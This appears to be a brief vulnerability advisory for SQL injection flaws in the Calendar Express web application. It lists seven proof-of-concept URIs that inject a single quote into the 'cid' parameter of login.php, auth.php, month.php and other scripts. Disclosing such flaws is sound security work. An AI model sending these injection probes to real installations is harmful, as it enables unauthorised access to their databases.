|
Calendar Express Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof-of-concept URIs are available: http://www.example.com/calendarexpress/login.php?cid=' http://www.example.com/calendarexpress/month.php?cid=' http://www.example.com/calendarexpress/auth.php?cid=' http://www.example.com/calendarexpress/year.php?cid=' http://www.example.com/calendarexpress/week.php?cid=' http://www.example.com/calendarexpress/day.php?cid=' http://www.example.com/calendarexpress/subscribe.php?cid=' |
|
|
Privacy Statement |
